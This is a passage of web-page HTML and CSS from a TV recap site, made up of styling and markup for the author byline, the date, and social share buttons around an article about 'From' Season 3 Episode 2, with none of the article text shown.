<style>.tdb-post-meta{margin-bottom:16px;color:#444;font-family:'Open Sans','Open Sans Regular',sans-serif;font-size:11px;font-weight:400;clear:none;vertical-align:middle;line-height:1}.tdb-post-meta span,.tdb-post-meta i,.tdb-post-meta time{vertical-align:middle}.tdb_single_author{line-height:30px}.tdb_single_author a{vertical-align:middle}.tdb_single_author .tdb-block-inner{display:flex;align-items:center}.tdb_single_author .tdb-author-name-wrap{display:flex}.tdb_single_author .tdb-author-name{font-weight:700;margin-right:3px}.tdb_single_author .tdb-author-by{margin-right:3px}.tdb_single_author .tdb-author-photo img{display:block}.tdi_15{display:inline-block}.tdi_15 .tdb-author-name-wrap{align-items:baseline}.tdi_15 .avatar{width:26px;height:26px;margin-right:6px;border-radius:50%}.tdi_15 .tdb-author-name{color:#fb4c7d;font-family:Rubik!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important}.tdi_15 .tdb-author-name:hover{color:#008d7f}.tdi_15 .tdb-author-by{font-family:Rubik!important;font-size:13px!important;line-height:1!important;font-weight:400!important;text-transform:capitalize!important}</style><div class="tdb-block-inner td-fix-index"><a class="tdb-author-photo" href="https://www.tvacute.com/author/admin188/" title="Olivia Wilson" data-wpel-link="internal" target="_self" rel="follow"><img alt="Olivia Wilson" src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-26x26.jpg&amp;nocache=1" data-lazy-srcset="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-52x52.jpg&amp;nocache=1 2x" class="avatar avatar-26 photo entered td-animation-stack-type0-2 lazyloaded" height="26" width="26" decoding="async" data-lazy-src="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-26x26.jpg&amp;nocache=1" data-ll-status="loaded" srcset="https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-52x52.jpg&amp;nocache=1 2x"><noscript><img alt='Olivia Wilson' src='https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-26x26.jpg&amp;nocache=1' srcset='https://www.tvacute.com/wp-content/webpc-passthru.php?src=https://www.tvacute.com/wp-content/uploads/2023/01/cropped-Olivia-52x52.jpg&amp;nocache=1 2x' class='avatar avatar-26 photo' height='26' width='26' decoding='async'/></noscript></a><div class="tdb-author-name-wrap"><span class="tdb-author-by">By</span> <a class="tdb-author-name" href="https://www.tvacute.com/author/admin188/" data-wpel-link="internal" target="_self" rel="follow">Olivia Wilson</a></div></div></div><div class="td_block_wrap tdb_single_date tdi_16 td-pb-border-top td_block_template_1 tdb-post-meta" data-td-block-uid="tdi_16">
<style>.tdb_single_date{line-height:30px}.tdb_single_date a{vertical-align:middle}.tdb_single_date .tdb-date-icon-svg{position:relative;line-height:0}.tdb_single_date svg{height:auto}.tdb_single_date svg,.tdb_single_date svg *{fill:#444}.tdi_16{display:inline-block;font-family:Rubik!important;font-size:13px!important;line-height:1!important;font-weight:400!important;text-transform:capitalize!important}.tdi_16 svg{width:14px}.tdi_16 .tdb-date-icon{margin-right:5px}</style><div class="tdb-block-inner td-fix-index"><time class="entry-date updated td-module-date" datetime="2024-09-29T06:56:36+00:00">September 29, 2024</time></div></div> <div class="td_block_wrap tdb_single_post_share tdi_17  td-pb-border-top td_block_template_1" data-td-block-uid="tdi_17">
<style>.tdi_17{margin-top:20px!important}@media (min-width:768px) and (max-width:1018px){.tdi_17{margin-top:10px!important;margin-bottom:15px!important}}@media (max-width:767px){.tdi_17{margin-top:15px!important;margin-bottom:20px!important}}</style>
<style>.tdb_single_post_share{margin-bottom:23px}.tdb-share-classic{position:relative;height:20px;margin-bottom:15px}.td-post-sharing-show-all-icons .td-social-sharing-hidden .td-social-expand-tabs{display:none}.td-post-sharing_display-vertically .td-post-sharing-visible,.td-post-sharing_display-vertically .td-social-sharing-hidden{display:flex;flex-direction:column}.tdi_17 .td-post-sharing-visible{align-items:flex-start}</style><div id="tdi_17" class="td-post-sharing tdb-block td-ps-border td-ps-border-grey td-ps-padding td-ps-icon-color td-ps-text-color td-post-sharing-style17 ">
<style>.td-post-sharing-classic{position:relative;height:20px}.td-post-sharing{margin-left:-3px;margin-right:-3px;font-family:'Open Sans','Open Sans Regular',sans-serif;z-index:2;white-space:nowrap;opacity:0}.td-post-sharing.td-social-show-all{white-space:normal}.td-js-loaded .td-post-sharing{-webkit-transition:opacity 0.3s;transition:opacity 0.3s;opacity:1}.td-post-sharing-classic+.td-post-sharing{margin-top:15px}@media (max-width:767px){.td-post-sharing-classic+.td-post-sharing{margin-top:8px}}.td-post-sharing-top{margin-bottom:30px}@media (max-width:767px){.td-post-sharing-top{margin-bottom:20px}}.td-post-sharing-bottom{border-style:solid;border-color:#ededed;border-width:1px 0;padding:21px 0;margin-bottom:42px}.td-post-sharing-bottom .td-post-sharing{margin-bottom:-7px}.td-post-sharing-visible,.td-social-sharing-hidden{display:inline-block}.td-social-sharing-hidden ul{display:none}.td-social-show-all .td-pulldown-filter-list{display:inline-block}.td-social-network,.td-social-handler{position:relative;display:inline-block;margin:0 3px 7px;height:40px;min-width:40px;font-size:11px;text-align:center;vertical-align:middle}.td-ps-notext .td-social-network .td-social-but-icon,.td-ps-notext .td-social-handler .td-social-but-icon{border-top-right-radius:2px;border-bottom-right-radius:2px}.td-social-network{color:#000;overflow:hidden}.td-social-network .td-social-but-icon{border-top-left-radius:2px;border-bottom-left-radius:2px}.td-social-network .td-social-but-text{border-top-right-radius:2px;border-bottom-right-radius:2px}.td-social-network:hover{opacity:0.8!important}.td-social-handler{color:#444;border:1px solid #e9e9e9;border-radius:2px}.td-social-handler .td-social-but-text{font-weight:700}.td-social-handler .td-social-but-text:before{background-color:#000;opacity:0.08}.td-social-share-text{margin-right:18px}.td-social-share-text:before,.td-social-share-text:after{content:'';position:absolute;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%);left:100%;width:0;height:0;border-style:solid}.td-social-share-text:before{border-width:9px 0 9px 11px;border-color:transparent transparent transparent #e9e9e9}.td-social-share-text:after{border-width:8px 0 8px 10px;border-color:transparent transparent transparent #fff}.td-social-but-text,.td-social-but-icon{display:inline-block;position:relative}.td-social-but-icon{padding-left:13px;padding-right:13px;line-height:40px;z-index:1}.td-social-but-icon i{position:relative;top:-1px;vertical-align:middle}.td-social-but-text{margin-left:-6px;padding-left:12px;padding-right:17px;line-height:40px}.td-social-but-text:before{content:'';position:absolute;top:12px;left:0;width:1px;height:16px;background-color:#fff;opacity:0.2;z-index:1}.td-social-handler i,.td-social-facebook i,.td-social-reddit i,.td-social-linkedin i,.td-social-tumblr i,.td-social-stumbleupon i,.td-social-vk i,.td-social-viber i,.td-social-flipboard i,.td-social-koo i{font-size:14px}.td-social-telegram i{font-size:16px}.td-social-mail i,.td-social-line i,.td-social-print i{font-size:15px}.td-social-handler .td-icon-share{top:-1px;left:-1px}.td-social-twitter .td-icon-twitter{font-size:14px}.td-social-pinterest .td-icon-pinterest{font-size:13px}.td-social-whatsapp .td-icon-whatsapp,.td-social-kakao .td-icon-kakao{font-size:18px}.td-social-kakao .td-icon-kakao:before{color:#3C1B1D}.td-social-reddit .td-social-but-icon{padding-right:12px}.td-social-reddit .td-icon-reddit{left:-1px}.td-social-telegram .td-social-but-icon{padding-right:12px}.td-social-telegram .td-icon-telegram{left:-1px}.td-social-stumbleupon .td-social-but-icon{padding-right:11px}.td-social-stumbleupon .td-icon-stumbleupon{left:-2px}.td-social-digg .td-social-but-icon{padding-right:11px}.td-social-digg .td-icon-digg{left:-2px;font-size:17px}.td-social-vk .td-social-but-icon{padding-right:11px}.td-social-vk .td-icon-vk{left:-2px}.td-social-naver .td-icon-naver{left:-1px;font-size:16px}.td-social-gettr .td-icon-gettr{font-size:25px}.td-ps-notext .td-social-gettr .td-icon-gettr{left:-5px}.td-social-copy_url{position:relative}.td-social-copy_url-check{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);color:#fff;opacity:0;pointer-events:none;transition:opacity .2s ease-in-out;z-index:11}.td-social-copy_url .td-icon-copy_url{left:-1px;font-size:17px}.td-social-copy_url-disabled{pointer-events:none}.td-social-copy_url-disabled .td-icon-copy_url{opacity:0}.td-social-copy_url-copied .td-social-copy_url-check{opacity:1}@keyframes social_copy_url_loader{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.td-social-expand-tabs i{top:-2px;left:-1px;font-size:16px}@media (min-width:767px){.td-social-line,.td-social-viber{display:none}}.td-ps-bg .td-social-network{color:#fff}.td-ps-bg .td-social-facebook .td-social-but-icon,.td-ps-bg .td-social-facebook .td-social-but-text{background-color:#516eab}.td-ps-bg .td-social-twitter .td-social-but-icon,.td-ps-bg .td-social-twitter .td-social-but-text{background-color:#29c5f6}.td-ps-bg .td-social-pinterest .td-social-but-icon,.td-ps-bg .td-social-pinterest .td-social-but-text{background-color:#ca212a}.td-ps-bg .td-social-whatsapp .td-social-but-icon,.td-ps-bg .td-social-whatsapp .td-social-but-text{background-color:#7bbf6a}.td-ps-bg .td-social-reddit .td-social-but-icon,.td-ps-bg .td-social-reddit .td-social-but-text{background-color:#f54200}.td-ps-bg .td-social-mail .td-social-but-icon,.td-ps-bg .td-social-digg .td-social-but-icon,.td-ps-bg .td-social-copy_url .td-social-but-icon,.td-ps-bg .td-social-mail .td-social-but-text,.td-ps-bg .td-social-digg .td-social-but-text,.td-ps-bg .td-social-copy_url .td-social-but-text{background-color:#000}.td-ps-bg .td-social-print .td-social-but-icon,.td-ps-bg .td-social-print .td-social-but-text{background-color:#333}.td-ps-bg .td-social-linkedin .td-social-but-icon,.td-ps-bg .td-social-linkedin .td-social-but-text{background-color:#0266a0}.td-ps-bg .td-social-tumblr .td-social-but-icon,.td-ps-bg .td-social-tumblr .td-social-but-text{background-color:#3e5a70}.td-ps-bg .td-social-telegram .td-social-but-icon,.td-ps-bg .td-social-telegram .td-social-but-text{background-color:#179cde}.td-ps-bg .td-social-stumbleupon .td-social-but-icon,.td-ps-bg .td-social-stumbleupon .td-social-but-text{background-color:#ee4813}.td-ps-bg .td-social-vk .td-social-but-icon,.td-ps-bg .td-social-vk .td-social-but-text{background-color:#4c75a3}.td-ps-bg .td-social-line .td-social-but-icon,.td-ps-bg .td-social-line .td-social-but-text{background-color:#00b900}.td-ps-bg .td-social-viber .td-social-but-icon,.td-ps-bg .td-social-viber .td-social-but-text{background-color:#5d54a4}.td-ps-bg .td-social-naver .td-social-but-icon,.td-ps-bg .td-social-naver .td-social-but-text{background-color:#3ec729}.td-ps-bg .td-social-flipboard .td-social-but-icon,.td-ps-bg .td-social-flipboard .td-social-but-text{background-color:#f42827}.td-ps-bg .td-social-kakao .td-social-but-icon,.td-ps-bg .td-social-kakao .td-social-but-text{background-color:#f9e000}.td-ps-bg .td-social-gettr .td-social-but-icon,.td-ps-bg .td-social-gettr .td-social-but-text{background-color:#fc223b}.td-ps-bg .td-social-koo .td-social-but-icon,.td-ps-bg .td-social-koo .td-social-but-text{background-color:#facd00}.td-ps-dark-bg .td-social-network{color:#fff}.td-ps-dark-bg .td-social-network .td-social-but-icon,.td-ps-dark-bg .td-social-network .td-social-but-text{background-color:#000}.td-ps-border .td-social-network .td-social-but-icon,.td-ps-border .td-social-network .td-social-but-text{line-height:38px;border-width:1px;border-style:solid}.td-ps-border .td-social-network .td-social-but-text{border-left-width:0}.td-ps-border .td-social-network .td-social-but-text:before{background-color:#000;opacity:0.08}.td-ps-border.td-ps-padding .td-social-network .td-social-but-icon{border-right-width:0}.td-ps-border.td-ps-padding .td-social-network.td-social-expand-tabs .td-social-but-icon{border-right-width:1px}.td-ps-border-grey .td-social-but-icon,.td-ps-border-grey .td-social-but-text{border-color:#e9e9e9}.td-ps-border-colored .td-social-facebook .td-social-but-icon,.td-ps-border-colored .td-social-facebook .td-social-but-text{border-color:#516eab}.td-ps-border-colored .td-social-twitter .td-social-but-icon,div.td-ps-border-colored .td-social-twitter .td-social-but-text{border-color:#29c5f6;color:#29c5f6}.td-ps-border-colored .td-social-pinterest .td-social-but-icon,.td-ps-border-colored .td-social-pinterest .td-social-but-text{border-color:#ca212a}.td-ps-border-colored .td-social-whatsapp .td-social-but-icon,.td-ps-border-colored .td-social-whatsapp .td-social-but-text{border-color:#7bbf6a}.td-ps-border-colored .td-social-reddit .td-social-but-icon,.td-ps-border-colored .td-social-reddit .td-social-but-text{border-color:#f54200}.td-ps-border-colored .td-social-mail .td-social-but-icon,.td-ps-border-colored .td-social-digg .td-social-but-icon,.td-ps-border-colored .td-social-copy_url .td-social-but-icon,.td-ps-border-colored .td-social-mail .td-social-but-text,.td-ps-border-colored .td-social-digg .td-social-but-text,.td-ps-border-colored .td-social-copy_url .td-social-but-text{border-color:#000}.td-ps-border-colored .td-social-print .td-social-but-icon,.td-ps-border-colored .td-social-print .td-social-but-text{border-color:#333}.td-ps-border-colored .td-social-linkedin .td-social-but-icon,.td-ps-border-colored .td-social-linkedin .td-social-but-text{border-color:#0266a0}.td-ps-border-colored .td-social-tumblr .td-social-but-icon,.td-ps-border-colored .td-social-tumblr .td-social-but-text{border-color:#3e5a70}.td-ps-border-colored .td-social-telegram .td-social-but-icon,.td-ps-border-colored .td-social-telegram .td-social-but-text{border-color:#179cde}.td-ps-border-colored .td-social-stumbleupon .td-social-but-icon,.td-ps-border-colored .td-social-stumbleupon .td-social-but-text{border-color:#ee4813}.td-ps-border-colored .td-social-vk .td-social-but-icon,.td-ps-border-colored .td-social-vk .td-social-but-text{border-color:#4c75a3}.td-ps-border-colored .td-social-line .td-social-but-icon,.td-ps-border-colored .td-social-line .td-social-but-text{border-color:#00b900}.td-ps-border-colored .td-social-viber .td-social-but-icon,.td-ps-border-colored .td-social-viber .td-social-but-text{border-color:#5d54a4}.td-ps-border-colored .td-social-naver .td-social-but-icon,.td-ps-border-colored .td-social-naver .td-social-but-text{border-color:#3ec729}.td-ps-border-colored .td-social-flipboard .td-social-but-icon,.td-ps-border-colored .td-social-flipboard .td-social-but-text{border-color:#f42827}.td-ps-border-colored .td-social-kakao .td-social-but-icon,.td-ps-border-colored .td-social-kakao .td-social-but-text{border-color:#f9e000}.td-ps-border-colored .td-social-gettr .td-social-but-icon,.td-ps-border-colored .td-social-gettr .td-social-but-text{border-color:#fc223b}.td-ps-border-colored .td-social-koo .td-social-but-icon,.td-ps-border-colored .td-social-koo .td-social-but-text{border-color:#facd00}.td-ps-icon-bg .td-social-but-icon{height:100%;border-color:transparent!important}.td-ps-icon-bg .td-social-network .td-social-but-icon{color:#fff}.td-ps-icon-bg .td-social-facebook .td-social-but-icon{background-color:#516eab}.td-ps-icon-bg .td-social-twitter .td-social-but-icon{background-color:#29c5f6}.td-ps-icon-bg .td-social-pinterest .td-social-but-icon{background-color:#ca212a}.td-ps-icon-bg .td-social-whatsapp .td-social-but-icon{background-color:#7bbf6a}.td-ps-icon-bg .td-social-reddit .td-social-but-icon{background-color:#f54200}.td-ps-icon-bg .td-social-mail .td-social-but-icon,.td-ps-icon-bg .td-social-digg .td-social-but-icon,.td-ps-icon-bg .td-social-copy_url .td-social-but-icon{background-color:#000}.td-ps-icon-bg .td-social-print .td-social-but-icon{background-color:#333}.td-ps-icon-bg .td-social-linkedin .td-social-but-icon{background-color:#0266a0}.td-ps-icon-bg .td-social-tumblr .td-social-but-icon{background-color:#3e5a70}.td-ps-icon-bg .td-social-telegram .td-social-but-icon{background-color:#179cde}.td-ps-icon-bg .td-social-stumbleupon .td-social-but-icon{background-color:#ee4813}.td-ps-icon-bg .td-social-vk .td-social-but-icon{background-color:#4c75a3}.td-ps-icon-bg .td-social-line .td-social-but-icon{background-color:#00b900}.td-ps-icon-bg .td-social-viber .td-social-but-icon{background-color:#5d54a4}.td-ps-icon-bg .td-social-naver .td-social-but-icon{background-color:#3ec729}.td-ps-icon-bg .td-social-flipboard .td-social-but-icon{background-color:#f42827}.td-ps-icon-bg .td-social-kakao .td-social-but-icon{background-color:#f9e000}.td-ps-icon-bg .td-social-gettr .td-social-but-icon{background-color:#fc223b}.td-ps-icon-bg .td-social-koo .td-social-but-icon{background-color:#facd00}.td-ps-icon-bg .td-social-but-text{margin-left:-3px}.td-ps-icon-bg .td-social-network .td-social-but-text:before{display:none}.td-ps-icon-arrow .td-social-network .td-social-but-icon:after{content:'';position:absolute;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%);left:calc(100% + 1px);width:0;height:0;border-style:solid;border-width:9px 0 9px 11px;border-color:transparent transparent transparent #000}.td-ps-icon-arrow .td-social-network .td-social-but-text{padding-left:20px}.td-ps-icon-arrow .td-social-network .td-social-but-text:before{display:none}.td-ps-icon-arrow.td-ps-padding .td-social-network .td-social-but-icon:after{left:100%}.td-ps-icon-arrow .td-social-facebook .td-social-but-icon:after{border-left-color:#516eab}.td-ps-icon-arrow .td-social-twitter .td-social-but-icon:after{border-left-color:#29c5f6}.td-ps-icon-arrow .td-social-pinterest .td-social-but-icon:after{border-left-color:#ca212a}.td-ps-icon-arrow .td-social-whatsapp .td-social-but-icon:after{border-left-color:#7bbf6a}.td-ps-icon-arrow .td-social-reddit .td-social-but-icon:after{border-left-color:#f54200}.td-ps-icon-arrow .td-social-mail .td-social-but-icon:after,.td-ps-icon-arrow .td-social-digg .td-social-but-icon:after,.td-ps-icon-arrow .td-social-copy_url .td-social-but-icon:after{border-left-color:#000}.td-ps-icon-arrow .td-social-print .td-social-but-icon:after{border-left-color:#333}.td-ps-icon-arrow .td-social-linkedin .td-social-but-icon:after{border-left-color:#0266a0}.td-ps-icon-arrow .td-social-tumblr .td-social-but-icon:after{border-left-color:#3e5a70}.td-ps-icon-arrow .td-social-telegram .td-social-but-icon:after{border-left-color:#179cde}.td-ps-icon-arrow .td-social-stumbleupon .td-social-but-icon:after{border-left-color:#ee4813}.td-ps-icon-arrow .td-social-vk .td-social-but-icon:after{border-left-color:#4c75a3}.td-ps-icon-arrow .td-social-line .td-social-but-icon:after{border-left-color:#00b900}.td-ps-icon-arrow .td-social-viber .td-social-but-icon:after{border-left-color:#5d54a4}.td-ps-icon-arrow .td-social-naver .td-social-but-icon:after{border-left-color:#3ec729}.td-ps-icon-arrow .td-social-flipboard .td-social-but-icon:after{border-left-color:#f42827}.td-ps-icon-arrow .td-social-kakao .td-social-but-icon:after{border-left-color:#f9e000}.td-ps-icon-arrow .td-social-gettr .td-social-but-icon:after{border-left-color:#fc223b}.td-ps-icon-arrow .td-social-koo .td-social-but-icon:after{border-left-color:#facd00}.td-ps-icon-arrow .td-social-expand-tabs .td-social-but-icon:after{display:none}.td-ps-icon-color .td-social-facebook .td-social-but-icon{color:#516eab}.td-ps-icon-color .td-social-pinterest .td-social-but-icon{color:#ca212a}.td-ps-icon-color .td-social-whatsapp .td-social-but-icon{color:#7bbf6a}.td-ps-icon-color .td-social-reddit .td-social-but-icon{color:#f54200}.td-ps-icon-color .td-social-mail .td-social-but-icon,.td-ps-icon-color .td-social-digg .td-social-but-icon,.td-ps-icon-color .td-social-copy_url .td-social-but-icon,.td-ps-icon-color .td-social-copy_url-check,.td-ps-icon-color .td-social-twitter .td-social-but-icon{color:#000}.td-ps-icon-color .td-social-print .td-social-but-icon{color:#333}.td-ps-icon-color .td-social-linkedin .td-social-but-icon{color:#0266a0}.td-ps-icon-color .td-social-tumblr .td-social-but-icon{color:#3e5a70}.td-ps-icon-color .td-social-telegram .td-social-but-icon{color:#179cde}.td-ps-icon-color .td-social-stumbleupon .td-social-but-icon{color:#ee4813}.td-ps-icon-color .td-social-vk .td-social-but-icon{color:#4c75a3}.td-ps-icon-color .td-social-line .td-social-but-icon{color:#00b900}.td-ps-icon-color .td-social-viber .td-social-but-icon{color:#5d54a4}.td-ps-icon-color .td-social-naver .td-social-but-icon{color:#3ec729}.td-ps-icon-color .td-social-flipboard .td-social-but-icon{color:#f42827}.td-ps-icon-color .td-social-kakao .td-social-but-icon{color:#f9e000}.td-ps-icon-color .td-social-gettr .td-social-but-icon{color:#fc223b}.td-ps-icon-color .td-social-koo .td-social-but-icon{color:#facd00}.td-ps-text-color .td-social-but-text{font-weight:700}.td-ps-text-color .td-social-facebook .td-social-but-text{color:#516eab}.td-ps-text-color .td-social-twitter .td-social-but-text{color:#29c5f6}.td-ps-text-color .td-social-pinterest .td-social-but-text{color:#ca212a}.td-ps-text-color .td-social-whatsapp .td-social-but-text{color:#7bbf6a}.td-ps-text-color .td-social-reddit .td-social-but-text{color:#f54200}.td-ps-text-color .td-social-mail .td-social-but-text,.td-ps-text-color .td-social-digg .td-social-but-text,.td-ps-text-color .td-social-copy_url .td-social-but-text{color:#000}.td-ps-text-color .td-social-print .td-social-but-text{color:#333}.td-ps-text-color .td-social-linkedin .td-social-but-text{color:#0266a0}.td-ps-text-color .td-social-tumblr .td-social-but-text{color:#3e5a70}.td-ps-text-color .td-social-telegram .td-social-but-text{color:#179cde}.td-ps-text-color .td-social-stumbleupon .td-social-but-text{color:#ee4813}.td-ps-text-color .td-social-vk .td-social-but-text{color:#4c75a3}.td-ps-text-color .td-social-line .td-social-but-text{color:#00b900}.td-ps-text-color .td-social-viber .td-social-but-text{color:#5d54a4}.td-ps-text-color .td-social-naver .td-social-but-text{color:#3ec729}.td-ps-text-color .td-social-flipboard .td-social-but-text{color:#f42827}.td-ps-text-color .td-social-kakao .td-social-but-text{color:#f9e000}.td-ps-text-color .td-social-gettr .td-social-but-text{color:#fc223b}.td-ps-text-color .td-social-koo .td-social-but-text{color:#facd00}.td-ps-text-color .td-social-expand-tabs .td-social-but-text{color:#b1b1b1}.td-ps-notext .td-social-but-icon{width:40px}.td-ps-notext .td-social-network .td-social-but-text{display:none}.td-ps-padding .td-social-network .td-social-but-icon{padding-left:17px;padding-right:17px}.td-ps-padding .td-social-handler .td-social-but-icon{width:40px}.td-ps-padding .td-social-reddit .td-social-but-icon,.td-ps-padding .td-social-telegram .td-social-but-icon{padding-right:16px}.td-ps-padding .td-social-stumbleupon .td-social-but-icon,.td-ps-padding .td-social-digg .td-social-but-icon,.td-ps-padding .td-social-expand-tabs .td-social-but-icon{padding-right:13px}.td-ps-padding .td-social-vk .td-social-but-icon{padding-right:14px}.td-ps-padding .td-social-expand-tabs .td-social-but-icon{padding-left:13px}.td-ps-rounded .td-social-network .td-social-but-icon{border-top-left-radius:100px;border-bottom-left-radius:100px}.td-ps-rounded .td-social-network .td-social-but-text{border-top-right-radius:100px;border-bottom-right-radius:100px}.td-ps-rounded.td-ps-notext .td-social-network .td-social-but-icon{border-top-right-radius:100px;border-bottom-right-radius:100px}.td-ps-rounded .td-social-expand-tabs{border-radius:100px}.td-ps-bar .td-social-network .td-social-but-icon,.td-ps-bar .td-social-network .td-social-but-text{-webkit-box-shadow:inset 0px -3px 0px 0px rgba(0,0,0,0.31);box-shadow:inset 0px -3px 0px 0px rgba(0,0,0,0.31)}.td-ps-bar .td-social-mail .td-social-but-icon,.td-ps-bar .td-social-digg .td-social-but-icon,.td-ps-bar .td-social-copy_url .td-social-but-icon,.td-ps-bar .td-social-mail .td-social-but-text,.td-ps-bar .td-social-digg .td-social-but-text,.td-ps-bar .td-social-copy_url .td-social-but-text{-webkit-box-shadow:inset 0px -3px 0px 0px rgba(255,255,255,0.28);box-shadow:inset 0px -3px 0px 0px rgba(255,255,255,0.28)}.td-ps-bar .td-social-print .td-social-but-icon,.td-ps-bar .td-social-print .td-social-but-text{-webkit-box-shadow:inset 0px -3px 0px 0px rgba(255,255,255,0.2);box-shadow:inset 0px -3px 0px 0px rgba(255,255,255,0.2)}.td-ps-big .td-social-but-icon{display:block;line-height:60px}.td-ps-big .td-social-but-icon .td-icon-share{width:auto}.td-ps-big .td-social-handler .td-social-but-text:before{display:none}.td-ps-big .td-social-share-text .td-social-but-icon{width:90px}.td-ps-big .td-social-expand-tabs .td-social-but-icon{width:60px}@media (max-width:767px){.td-ps-big .td-social-share-text{display:none}}.td-ps-big .td-social-facebook i,.td-ps-big .td-social-reddit i,.td-ps-big .td-social-mail i,.td-ps-big .td-social-linkedin i,.td-ps-big .td-social-tumblr i,.td-ps-big .td-social-stumbleupon i{margin-top:-2px}.td-ps-big .td-social-facebook i,.td-ps-big .td-social-reddit i,.td-ps-big .td-social-linkedin i,.td-ps-big .td-social-tumblr i,.td-ps-big .td-social-stumbleupon i,.td-ps-big .td-social-vk i,.td-ps-big .td-social-viber i,.td-ps-big .td-social-fliboard i,.td-ps-big .td-social-koo i,.td-ps-big .td-social-share-text i{font-size:22px}.td-ps-big .td-social-telegram i{font-size:24px}.td-ps-big .td-social-mail i,.td-ps-big .td-social-line i,.td-ps-big .td-social-print i{font-size:23px}.td-ps-big .td-social-twitter i,.td-ps-big .td-social-expand-tabs i{font-size:20px}.td-ps-big .td-social-whatsapp i,.td-ps-big .td-social-naver i,.td-ps-big .td-social-flipboard i,.td-ps-big .td-social-kakao i{font-size:26px}.td-ps-big .td-social-pinterest .td-icon-pinterest{font-size:21px}.td-ps-big .td-social-telegram .td-icon-telegram{left:1px}.td-ps-big .td-social-stumbleupon .td-icon-stumbleupon{left:-2px}.td-ps-big .td-social-digg .td-icon-digg{left:-1px;font-size:25px}.td-ps-big .td-social-vk .td-icon-vk{left:-1px}.td-ps-big .td-social-naver .td-icon-naver{left:0}.td-ps-big .td-social-gettr .td-icon-gettr{left:-1px}.td-ps-big .td-social-copy_url .td-icon-copy_url{left:0;font-size:25px}.td-ps-big .td-social-copy_url-check{font-size:18px}.td-ps-big .td-social-but-text{margin-left:0;padding-top:0;padding-left:17px}.td-ps-big.td-ps-notext .td-social-network,.td-ps-big.td-ps-notext .td-social-handler{height:60px}.td-ps-big.td-ps-notext .td-social-network{width:60px}.td-ps-big.td-ps-notext .td-social-network .td-social-but-icon{width:60px}.td-ps-big.td-ps-notext .td-social-share-text .td-social-but-icon{line-height:40px}.td-ps-big.td-ps-notext .td-social-share-text .td-social-but-text{display:block;line-height:1}.td-ps-big.td-ps-padding .td-social-network,.td-ps-big.td-ps-padding .td-social-handler{height:90px;font-size:13px}.td-ps-big.td-ps-padding .td-social-network{min-width:60px}.td-ps-big.td-ps-padding .td-social-but-icon{border-bottom-left-radius:0;border-top-right-radius:2px}.td-ps-big.td-ps-padding.td-ps-bar .td-social-but-icon{-webkit-box-shadow:none;box-shadow:none}.td-ps-big.td-ps-padding .td-social-but-text{display:block;padding-bottom:17px;line-height:1;border-top-left-radius:0;border-top-right-radius:0;border-bottom-left-radius:2px}.td-ps-big.td-ps-padding .td-social-but-text:before{display:none}.td-ps-big.td-ps-padding .td-social-expand-tabs i{line-height:90px}.td-ps-nogap{margin-left:0;margin-right:0}.td-ps-nogap .td-social-network,.td-ps-nogap .td-social-handler{margin-left:0;margin-right:0;border-radius:0}.td-ps-nogap .td-social-network .td-social-but-icon,.td-ps-nogap .td-social-network .td-social-but-text{border-radius:0}.td-ps-nogap .td-social-expand-tabs{border-radius:0}.td-post-sharing-style7 .td-social-network .td-social-but-icon{height:100%}.td-post-sharing-style7 .td-social-network .td-social-but-icon:before{content:'';position:absolute;top:0;left:0;width:100%;height:100%;background-color:rgba(0,0,0,0.31)}.td-post-sharing-style7 .td-social-network .td-social-but-text{padding-left:17px}.td-post-sharing-style7 .td-social-network .td-social-but-text:before{display:none}.td-post-sharing-style7 .td-social-mail .td-social-but-icon:before,.td-post-sharing-style7 .td-social-digg .td-social-but-icon:before,.td-post-sharing-style7 .td-social-copy_url .td-social-but-icon:before{background-color:rgba(255,255,255,0.2)}.td-post-sharing-style7 .td-social-print .td-social-but-icon:before{background-color:rgba(255,255,255,0.1)}@media (max-width:767px){.td-post-sharing-style1 .td-social-share-text .td-social-but-text,.td-post-sharing-style3 .td-social-share-text .td-social-but-text,.td-post-sharing-style5 .td-social-share-text .td-social-but-text,.td-post-sharing-style14 .td-social-share-text .td-social-but-text,.td-post-sharing-style16 .td-social-share-text .td-social-but-text{display:none!important}}@media (max-width:767px){.td-post-sharing-style2 .td-social-share-text,.td-post-sharing-style4 .td-social-share-text,.td-post-sharing-style6 .td-social-share-text,.td-post-sharing-style7 .td-social-share-text,.td-post-sharing-style15 .td-social-share-text,.td-post-sharing-style17 .td-social-share-text,.td-post-sharing-style18 .td-social-share-text,.td-post-sharing-style19 .td-social-share-text,.td-post-sharing-style20 .td-social-share-text{display:none!important}}</style>
<div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.tvacute.com%2Ffrom-season-3-episode-2-recap%2F" title="Facebook" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer"><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=From+Season+3+Episode+2+Recap+and+Ending+Explained%21&amp;url=https%3A%2F%2Fwww.tvacute.com%2Ffrom-season-3-episode-2-recap%2F&amp;via=tvacute" title="Twitter" data-wpel-link="external" target="_blank" rel="nofollow external noopener noreferrer"><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://www.tvacute.com/from-season-3-episode-2-recap/&amp;media=https://www.tvacute.com/wp-content/uploads/2024/09/from-season-3-episode-2-When-We-Go.avif&amp;description=From+Season+3+Episode+2+Recap+and+Ending+Explained%21" 